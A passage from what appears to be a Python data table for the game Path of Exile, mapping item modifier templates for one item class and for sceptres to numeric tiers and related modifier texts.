"#% increased Life Recovery from Flasks": [(40, '4% increased maximum Life'), (80, '(5 - 6)% increased maximum Life'), (200, '(7 - 8)% increased maximum Life\n(7 - 10)% increased Life Recovery from Flasks')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\n2% increased Experience gain')],
"#% increased Lightning Damage": [(20, '8% increased Lightning Damage'), (40, '(9 - 10)% increased Lightning Damage'), (60, '(11 - 12)% increased Lightning Damage'), (80, '(13 - 14)% increased Lightning Damage'), (200, '(15 - 16)% increased Lightning Damage\nAdds (1 - 5) to (50 - 52) Lightning Damage')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n(3.02 - 4.0) Mana Regenerated per second')],
"#% increased Rarity of Items found": [(50, '(19 - 20)% increased Rarity of Items found'), (100, '(21 - 22)% increased Rarity of Items found'), (145, '(23 - 25)% increased Rarity of Items found'), (200, '(4 - 5)% increased Movement Speed')],
"#% of Chaos Damage Leeched as Life": [(0.25, '(11 - 12)% increased Chaos Damage'), (0.5, '(13 - 14)% increased Chaos Damage'), (1.0, '(15 - 16)% increased Chaos Damage\n0.2% of Chaos Damage Leeched as Life')],
"#% of Cold Damage Leeched as Life": [(0.25, '(11 - 12)% increased Cold Damage'), (0.5, '(13 - 14)% increased Cold Damage'), (1.0, '(15 - 16)% increased Cold Damage\n0.2% of Cold Damage Leeched as Life')],
"#% of Damage taken gained as Mana over 4 seconds when Hit": [(8, '(2.0 - 2.5) Mana Regenerated per second'), (16, '(2.52 - 3.0) Mana Regenerated per second'), (50, '(3.02 - 4.0) Mana Regenerated per second')],
"#% of Fire Damage Leeched as Life": [(0.25, '(11 - 12)% increased Fire Damage'), (0.5, '(13 - 14)% increased Fire Damage'), (1.0, '(15 - 16)% increased Fire Damage\n0.2% of Fire Damage Leeched as Life')],
"#% of Lightning Damage Leeched as Life": [(0.25, '(11 - 12)% increased Lightning Damage'), (0.5, '(13 - 14)% increased Lightning Damage'), (1.0, '(15 - 16)% increased Lightning Damage\n0.2% of Lightning Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Life": [(0.7, '(13 - 16)% increased Damage while Leeching Life'), (1.0, '(17 - 21)% increased Damage while Leeching Life'), (4.0, '(22 - 25)% increased Damage while Leeching Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (0.7, '(13 - 16)% increased Damage while Leeching Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (1.0, '(17 - 21)% increased Damage while Leeching Mana'), (4.0, '(22 - 25)% increased Damage while Leeching Mana')],
"#% of Physical Damage Leeched as Life": [(0.25, '(11 - 12)% increased Global Physical Damage'), (0.5, '(13 - 14)% increased Global Physical Damage'), (1.0, '(15 - 16)% increased Global Physical Damage\n0.2% of Physical Damage Leeched as Life')],
"#% reduced Mana Cost of Skills": [(10, '2% reduced Mana Cost of Skills'), (20, '3% reduced Mana Cost of Skills'), (50, '(4 - 5)% reduced Mana Cost of Skills')],
"#% reduced Reflected Damage taken": [(11, '(8 - 5)% reduced Reflected Damage taken'), (22, '(12 - 9)% reduced Reflected Damage taken'), (50, '(15 - 13)% reduced Reflected Damage taken')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (6, '(9 - 15) Life gained for each Enemy hit by your Attacks')],
"+# Life gained on Kill": [(15, '(6 - 8) Life gained on Kill'), (25, '(9 - 11) Life gained on Kill'), (35, '(12 - 15) Life gained on Kill'), (100, '(12 - 15) Life gained on Kill\nRecover (1 - 2)% of Maximum Life on Kill')],
"+# Mana gained on Kill": [(5, '3 Mana gained on Kill'), (10, '4 Mana gained on Kill'), (15, '5 Mana gained on Kill'), (50, '5 Mana gained on Kill\nRecover (1 - 2)% of Maximum Mana on Kill')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (1400, '(18 - 20)% increased Global Accuracy Rating'), (2000, '(18 - 20)% increased Global Accuracy Rating\n(150 - 250) to Accuracy Rating')],
"+# to Armour": [(400, '(7 - 9)% increased Armour'), (700, '(10 - 12)% increased Armour'), (1500, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '6% increased Dexterity\nYou gain Onslaught for 4.0 seconds on Hit')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(150, '(7 - 9)% increased Evasion Rating'), (300, '(10 - 12)% increased Evasion Rating'), (450, '(13 - 15)% increased Evasion Rating'), (1000, '(13 - 15)% increased Evasion Rating\n(16 - 25)% chance to Avoid Elemental Ailments')],
"+# to Intelligence": [(100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '6% increased Intelligence\n100% chance to Gain Arcane Surge on Hit with Spells')],
"+# to Level of Socketed Gems": [(4, 'Grants Level 10 Anger Skill\nGrants Level 10 Hatred Skill\nGrants Level 10 Wrath Skill'), (7, 'Grants Level 15 Anger Skill\nGrants Level 15 Hatred Skill\nGrants Level 15 Wrath Skill'), (20, 'Has 1 Socket')],
"+# to Minimum Endurance Charges": [(1, '(8 - 11)% increased Endurance Charge Duration'), (2, '(12 - 15)% increased Endurance Charge Duration'), (5, '0.3% of maximum Life Regenerated per second per Endurance Charge')],
"+# to Minimum Frenzy Charges": [(1, '(8 - 11)% increased Frenzy Charge Duration'), (2, '(12 - 15)% increased Frenzy Charge Duration'), (5, '6% increased Evasion Rating per Frenzy Charge')],
"+# to Minimum Power Charges": [(1, '(8 - 11)% increased Power Charge Duration'), (2, '(12 - 15)% increased Power Charge Duration'), (5, '6% increased Spell Damage per Power Charge')],
"+# to Strength": [(100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '6% increased Strength\n100% chance to Intimidate Enemies for 4 seconds on Hit with Attacks')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Total Mana Cost of Skills": [(12, '-1 to Total Mana Cost of Skills'), (24, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"+# to all Attributes": [(15, '(6 - 7) to all Attributes'), (30, '(8 - 9) to all Attributes'), (45, '(10 - 12) to all Attributes'), (100, '6% increased Strength\n6% increased Dexterity\n6% increased Intelligence\n1 to Maximum Endurance Charges\n1 to Maximum Frenzy Charges\n1 to Maximum Power Charges')],
"+# to maximum Energy Shield": [(50, '(4 - 5)% increased maximum Energy Shield'), (100, '(6 - 7)% increased maximum Energy Shield'), (130, '(8 - 10)% increased maximum Energy Shield'), (500, '(8 - 10)% increased maximum Energy Shield\n(7 - 10)% faster start of Energy Shield Recharge')],
"+# to maximum Life": [(200, '4% increased maximum Life'), (230, '(5 - 6)% increased maximum Life'), (1000, '(7 - 8)% increased maximum Life')],
"+# to maximum Mana": [(100, '6% increased maximum Mana'), (200, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+#% chance to Evade Attacks": [(3, '(7 - 9)% increased Evasion Rating'), (5, '(10 - 12)% increased Evasion Rating'), (10, '(13 - 15)% increased Evasion Rating\nGrace has (15 - 20)% increased Aura Effect')],
"+#% to Chaos Resistance": [(70, '(-17 - -13) Chaos Damage taken'), (120, '(-31 - -18) Chaos Damage taken')],
"+#% to Cold Resistance": [(50, '(-15 - -10) Cold Damage taken when Hit'), (100, '(-40 - -16) Cold Damage taken when Hit'), (150, '(-80 - -40) Cold Damage taken when Hit')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Critical Strike Multiplier if you've Shattered an Enemy Recently": [(35, '12 to Global Critical Strike Multiplier'), (55, '(13 - 14) to Global Critical Strike Multiplier'), (100, '(15 - 16) to Global Critical Strike Multiplier')],
"+#% to Fire Resistance": [(50, '(-15 - -10) Fire Damage taken when Hit'), (100, '(-40 - -16) Fire Damage taken when Hit'), (150, '(-80 - -40) Fire Damage taken when Hit')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(30, '(15 - 16) to Global Critical Strike Multiplier'), (60, '(17 - 18) to Global Critical Strike Multiplier'), (100, '(19 - 20) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '(-15 - -10) Lightning Damage taken when Hit'), (100, '(-40 - -16) Lightning Damage taken when Hit'), (150, '(-80 - -40) Lightning Damage taken when Hit')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to all Elemental Resistances": [(15, '(-15 - -10) Fire Damage taken when Hit\n(-15 - -10) Cold Damage taken when Hit\n(-15 - -10) Lightning Damage taken when Hit'), (30, '(-40 - -16) Fire Damage taken when Hit\n(-40 - -16) Cold Damage taken when Hit\n(-40 - -16) Lightning Damage taken when Hit'), (45, '(-80 - -40) Fire Damage taken when Hit\n(-80 - -40) Cold Damage taken when Hit\n(-80 - -40) Lightning Damage taken when Hit'), (100, '(-80 - -40) Fire Damage taken when Hit\n(-80 - -40) Cold Damage taken when Hit\n(-80 - -40) Lightning Damage taken when Hit\nGrants Level 25 Purity of Fire Skill\nGrants Level 25 Purity of Ice Skill\nGrants Level 25 Purity of Lightning Skill')],
"Adds # to # Chaos Damage to Attacks": [(40, '(11 - 12)% increased Chaos Damage'), (75, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage')],
"Adds # to # Cold Damage": [(20, '8% increased Cold Damage'), (40, '(9 - 10)% increased Cold Damage'), (100, '(11 - 12)% increased Cold Damage')],
"Adds # to # Cold Damage to Attacks": [(30, '(11 - 12)% increased Cold Damage'), (60, '(13 - 14)% increased Cold Damage'), (90, '(15 - 16)% increased Cold Damage'), (105, '(15 - 16)% increased Cold Damage\nCurse Enemies with Level 5 Frostbite on Hit')],
"Adds # to # Fire Damage": [(20, '8% increased Fire Damage'), (40, '(9 - 10)% increased Fire Damage'), (100, '(11 - 12)% increased Fire Damage')],
"Adds # to # Fire Damage to Attacks": [(40, '(11 - 12)% increased Fire Damage'), (80, '(13 - 14)% increased Fire Damage'), (120, '(15 - 16)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage\nCurse Enemies with Level 5 Flammability on Hit')],
"Adds # to # Lightning Damage": [(35, '8% increased Lightning Damage'), (65, '(9 - 10)% increased Lightning Damage'), (100, '(11 - 12)% increased Lightning Damage')],
"Adds # to # Lightning Damage to Attacks": [(75, '(11 - 12)% increased Lightning Damage'), (150, '(13 - 14)% increased Lightning Damage'), (190, '(15 - 16)% increased Lightning Damage'), (300, '(15 - 16)% increased Lightning Damage\nCurse Enemies with Level 5 Conductivity on Hit')],
"Adds # to # Physical Damage to Attacks": [(20, '(11 - 12)% increased Global Physical Damage'), (30, '(13 - 14)% increased Global Physical Damage'), (40, '(15 - 16)% increased Global Physical Damage'), (100, '(15 - 16)% increased Global Physical Damage\nCurse Enemies with Level 5 Vulnerability on Hit')],
"Cannot be Shocked or Ignited while moving": [(1, '(13 - 14)% chance to Avoid being Ignited\n(13 - 14)% chance to Avoid being Shocked'), (2, '(15 - 17)% chance to Avoid being Ignited\n(15 - 17)% chance to Avoid being Shocked'), (5, '(18 - 20)% chance to Avoid being Ignited\n(18 - 20)% chance to Avoid being Shocked')],
"Gain #% of Physical Damage as Extra Fire Damage": [(11, '(11 - 12)% increased Fire Damage'), (22, '(13 - 14)% increased Fire Damage'), (50, '(15 - 16)% increased Fire Damage\nGain (3 - 5)% of Physical Damage as Extra Fire Damage')],
"Minions have #% increased Movement Speed": [(40, 'Minions have (4 - 5)% increased Movement Speed'), (75, 'Minions have (6 - 7)% increased Movement Speed'), (200, 'Minions have (8 - 10)% increased Movement Speed')],
"Shock nearby Enemies for # Seconds when you Focus": [(10.0, '(8 - 10)% increased Shock Duration on Enemies'), (15.0, '(12 - 15)% increased Shock Duration on Enemies')],
"Vaal Skills deal #% increased Damage": [(55, 'Vaal Skills deal (13 - 16)% increased Damage'), (110, 'Vaal Skills deal (17 - 21)% increased Damage'), (200, '(15 - 20)% increased Damage if Corrupted')],
},
"Sceptre": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Ignite": [(20, '6% chance to Ignite'), (40, '7% chance to Ignite'), (200, '8% chance to Ignite\n(8 - 10)% increased Ignite Duration on Enemies')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Shock": [(20, '6% chance to Shock'), (40, '7% chance to Shock'), (200, '8% chance to Shock\n(8 - 10)% increased Shock Duration on Enemies')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed\n(5 - 6)% increased Cast Speed'), (50, '(5 - 6)% increased Attack Speed\n(7 - 9)% increased Cast Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Burning Damage": [(35, '(14 - 18)% increased Burning Damage'), (70, '(19 - 23)% increased Burning Damage'), (500, '(24 - 28)% increased Burning Damage\nIgnites you inflict deal Damage (15 - 20)% faster')],
"#% increased Cast Speed": [(40, '(5 - 6)% increased Cast Speed'), (65, '(7 - 9)% increased Cast Speed'), (200, '(10 - 12)% increased Cast Speed')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.3% of Mana Regenerated per second')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted\n(40 - 50)% increased Spell Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (5 - 6) Lightning Damage to Attacks with this Weapon per 10 Intelligence'), (200, '1% increased Spell Damage per 16 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength'), (200, '1% increased Spell Damage per 16 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana'), (500, '(6 - 8)% increased Attack Damage per 500 Maximum Mana\n(6 - 8)% increased Spell Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance')],
"+#% to Cold Damage over Time Multiplier": [(45, '(9 - 10) to Cold Damage over Time Multiplier'), (90, '(11 - 12) to Cold Damage over Time Multiplier'), (500, '(13 - 15) to Cold Damage over Time Multiplier')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
